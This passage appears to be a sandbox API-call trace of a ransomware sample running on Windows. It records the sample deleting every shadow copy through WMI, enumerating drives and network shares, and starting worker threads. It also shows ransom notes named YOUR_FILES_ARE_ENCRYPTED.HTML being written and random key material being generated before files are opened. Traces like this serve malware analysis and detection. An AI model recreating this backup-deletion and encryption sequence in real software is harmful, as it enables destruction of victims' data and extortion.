(lpString="{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}") returned 38 [0136.731] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}'") returned 60 [0136.731] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{7FDBE5D0-4D96-4E22-BF66-4C104B34E1BC}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0138.230] GetProcessHeap () returned 0x270000 [0138.231] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0138.231] IUnknown:Release (This=0x2e7f50) returned 0x0 [0138.231] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0138.233] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0138.233] lstrlenW (lpString="{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}") returned 38 [0138.233] GetProcessHeap () returned 0x270000 [0138.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0138.233] lstrlenW (lpString="{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}") returned 38 [0138.233] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}'") returned 60 [0138.233] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{4E8DC638-E2E6-42CE-97D7-0636246C3FE4}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0139.913] GetProcessHeap () returned 0x270000 [0139.913] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0139.914] IUnknown:Release (This=0x2e7f50) returned 0x0 [0139.914] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0139.916] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d2574, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0139.916] lstrlenW (lpString="{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}") returned 38 [0139.916] GetProcessHeap () returned 0x270000 [0139.916] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0139.916] lstrlenW (lpString="{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}") returned 38 [0139.916] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}'") returned 60 [0139.916] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{053E5C4B-AC14-41B6-8FD9-E0F985D0281C}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0142.105] GetProcessHeap () returned 0x270000 [0142.105] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0142.105] IUnknown:Release (This=0x2e7f50) returned 0x0 [0142.105] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x1) returned 0x0 [0142.107] IWbemClassObject:Get (in: This=0x2e7f50, wszName="id", lFlags=0, pVal=0x4ebe9f4*(varType=0x0, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1=0x2d25fc, varVal2=0xf40023), pType=0x0, plFlavor=0x0 | out: pVal=0x4ebe9f4*(varType=0x8, wReserved1=0x2d, wReserved2=0xea30, wReserved3=0x4eb, varVal1="{94982F36-7196-40C7-AE66-35750915EE46}", varVal2=0xf40023), pType=0x0, plFlavor=0x0) returned 0x0 [0142.107] lstrlenW (lpString="{94982F36-7196-40C7-AE66-35750915EE46}") returned 38 [0142.107] GetProcessHeap () returned 0x270000 [0142.107] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x2d24e8 [0142.107] lstrlenW (lpString="{94982F36-7196-40C7-AE66-35750915EE46}") returned 38 [0142.107] wnsprintfW (in: pszDest=0x2d24e8, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{94982F36-7196-40C7-AE66-35750915EE46}'") returned 60 [0142.107] IWbemServices:DeleteInstance (in: This=0x4271938, strObjectPath="Win32_ShadowCopy.ID='{94982F36-7196-40C7-AE66-35750915EE46}'", lFlags=0, pCtx=0x316718, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0142.197] GetProcessHeap () returned 0x270000 [0142.197] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2d24e8 | out: hHeap=0x270000) returned 1 [0142.197] IUnknown:Release (This=0x2e7f50) returned 0x0 [0142.197] IEnumWbemClassObject:Next (in: This=0x309a58, lTimeout=-1, uCount=0x1, apObjects=0x4ebea28, puReturned=0x4ebea68 | out: apObjects=0x4ebea28*=0x2e7f50, puReturned=0x4ebea68*=0x0) returned 0x1 [0142.202] WbemLocator:IUnknown:Release (This=0x4271938) returned 0x0 [0142.204] WbemLocator:IUnknown:Release (This=0x42907c0) returned 0x0 [0142.205] WbemContext:IUnknown:Release (This=0x316718) returned 0x0 [0142.207] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0142.207] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0142.208] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0142.209] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0142.210] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.211] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0142.211] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0142.212] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0142.212] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0142.212] GetProcessHeap () returned 0x270000 [0142.212] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x42f3f28 [0142.214] GetProcessHeap () returned 0x270000 [0142.214] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x4303f30 [0142.216] FindFirstVolumeW (in: lpszVolumeName=0x42f3f28, cchBufferLength=0x8000 | out: lpszVolumeName="\\\\?\\Volume{36c5f042-7156-11eb-8857-806e6f6e6963}\\") returned 0x329c18 [0142.216] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{36c5f042-7156-11eb-8857-806e6f6e6963}\\", lpszVolumePathNames=0x4ebe8d0, cchBufferLength=0x78, lpcchReturnLength=0x4ebea94 | out: lpszVolumePathNames=0x4ebe8d0, lpcchReturnLength=0x4ebea94) returned 1 [0142.217] lstrlenW (lpString="C:\\") returned 3 [0142.217] FindNextVolumeW (in: hFindVolume=0x329c18, lpszVolumeName=0x42f3f28, cchBufferLength=0x7fff | out: hFindVolume=0x329c18, lpszVolumeName="\\\\?\\Volume{36c5f042-7156-11eb-8857-806e6f6e6963}\\") returned 0 [0142.217] FindVolumeClose (hFindVolume=0x329c18) returned 1 [0142.217] GetProcessHeap () returned 0x270000 [0142.218] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x4303f30 | out: hHeap=0x270000) returned 1 [0142.218] GetProcessHeap () returned 0x270000 [0142.219] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42f3f28 | out: hHeap=0x270000) returned 1 [0142.219] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x3a0 [0142.219] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x424 [0142.220] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x428 [0142.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x394 [0142.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x398 [0142.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x530 [0142.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x534 [0142.223] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x538 [0142.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x44f2770, lpParameter=0x3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x53c [0142.227] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x4ebea54 | out: lphEnum=0x4ebea54*=0x42f2fc0) returned 0x0 [0142.758] GetProcessHeap () returned 0x270000 [0142.758] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4000) returned 0x42f7f28 [0142.758] WNetEnumResourceW (in: hEnum=0x42f2fc0, lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58 | out: lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58) returned 0x0 [0142.758] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x42f7f28, lphEnum=0x4ebe730 | out: lphEnum=0x4ebe730*=0x42bb1c0) returned 0x0 [0142.762] GetProcessHeap () returned 0x270000 [0142.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4000) returned 0x42fbf30 [0142.763] WNetEnumResourceW (in: hEnum=0x42bb1c0, lpcCount=0x4ebe75c, lpBuffer=0x42fbf30, lpBufferSize=0x4ebe734 | out: lpcCount=0x4ebe75c, lpBuffer=0x42fbf30, lpBufferSize=0x4ebe734) returned 0x103 [0142.763] GetProcessHeap () returned 0x270000 [0142.763] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42fbf30 | out: hHeap=0x270000) returned 1 [0142.763] WNetCloseEnum (hEnum=0x42bb1c0) returned 0x0 [0142.763] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x42f7f48, lphEnum=0x4ebe730 | out: lphEnum=0x4ebe730*=0x42bb1c0) returned 0x4b8 [0155.006] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x42f7f68, lphEnum=0x4ebe730 | out: lphEnum=0x4ebe730*=0x42bb1c0) returned 0x4c6 [0155.007] WNetEnumResourceW (in: hEnum=0x42f2fc0, lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58 | out: lpcCount=0x4ebea80, lpBuffer=0x42f7f28, lpBufferSize=0x4ebea58) returned 0x103 [0155.007] GetProcessHeap () returned 0x270000 [0155.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x42f7f28 | out: hHeap=0x270000) returned 1 [0155.008] WNetCloseEnum (hEnum=0x42f2fc0) returned 0x0 [0155.008] GetLogicalDrives () returned 0x4 [0155.008] GetProcessHeap () returned 0x270000 [0155.008] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x42fdf30 [0155.009] wnsprintfW (in: pszDest=0x42fdf30, cchDest=32768, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0155.009] GetDriveTypeW (lpRootPathName="\\\\?\\C:") returned 0x1 [0155.009] GetProcessHeap () returned 0x270000 [0155.009] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x430df38 [0155.010] lstrcpyW (in: lpString1=0x430df38, lpString2="\\\\?\\C:" | out: lpString1="\\\\?\\C:") returned="\\\\?\\C:" [0155.010] lstrcatW (in: lpString1="\\\\?\\C:", lpString2="\\*" | out: lpString1="\\\\?\\C:\\*") returned="\\\\?\\C:\\*" [0155.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xdbbd37a6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x42f2fc0 [0155.011] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0155.011] GetProcessHeap () returned 0x270000 [0155.011] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.012] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\$Recycle.Bin" | out: lpString1="\\\\?\\C:\\$Recycle.Bin") returned="\\\\?\\C:\\$Recycle.Bin" [0155.012] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\*") returned="\\\\?\\C:\\$Recycle.Bin\\*" [0155.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xdbbd37a6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.013] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xdbbd37a6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName="..", cAlternateFileName="")) returned 1 [0155.013] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName="S-1-5-21-3683305739-1236715609-858405165-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0155.013] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000") returned 65 [0155.013] GetProcessHeap () returned 0x270000 [0155.013] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.015] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000" [0155.015] lstrcatW (in: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000", lpString2="\\*" | out: lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\*" [0155.015] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.015] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.015] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.016] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\desktop.ini") returned 77 [0155.016] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.016] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0155.016] lstrlenW (lpString=".ini") returned 4 [0155.016] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0155.016] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0155.016] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.016] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0155.016] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\s-1-5-21-3683305739-1236715609-858405165-1000\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.018] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.021] CloseHandle (hObject=0x4a4) returned 1 [0155.022] GetProcessHeap () returned 0x270000 [0155.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.023] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName="S-1-5-21-3683305739-1236715609-858405165-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0155.023] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0155.023] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 49 [0155.023] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0155.024] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0155.026] CloseHandle (hObject=0x580) returned 1 [0155.026] GetProcessHeap () returned 0x270000 [0155.027] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.027] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdb0de4, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdb0de4, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="autoexec.bat", cAlternateFileName="")) returned 1 [0155.027] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\autoexec.bat") returned 19 [0155.027] lstrcmpW (lpString1="autoexec.bat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.027] PathFindExtensionW (pszPath="autoexec.bat") returned=".bat" [0155.027] lstrlenW (lpString=".bat") returned 4 [0155.027] PathFindExtensionW (pszPath="autoexec.bat") returned=".bat" [0155.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76130000 [0155.029] GetProcAddress (hModule=0x76130000, lpProcName="SystemFunction036") returned 0x76131919 [0155.029] SystemFunction036 (in: RandomBuffer=0x4ebe728, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebe728) returned 1 [0155.029] CreateFileW (lpFileName="\\\\?\\C:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x580 [0155.029] GetFileSizeEx (in: hFile=0x580, lpFileSize=0x4ebe74c | out: lpFileSize=0x4ebe74c*=24) returned 1 [0155.029] CloseHandle (hObject=0x580) returned 1 [0155.029] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x4506fa00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x4506fa00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="Boot", cAlternateFileName="")) returned 1 [0155.029] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0155.030] GetProcessHeap () returned 0x270000 [0155.030] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.030] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Boot" | out: lpString1="\\\\?\\C:\\Boot") returned="\\\\?\\C:\\Boot" [0155.030] lstrcatW (in: lpString1="\\\\?\\C:\\Boot", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\*") returned="\\\\?\\C:\\Boot\\*" [0155.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", 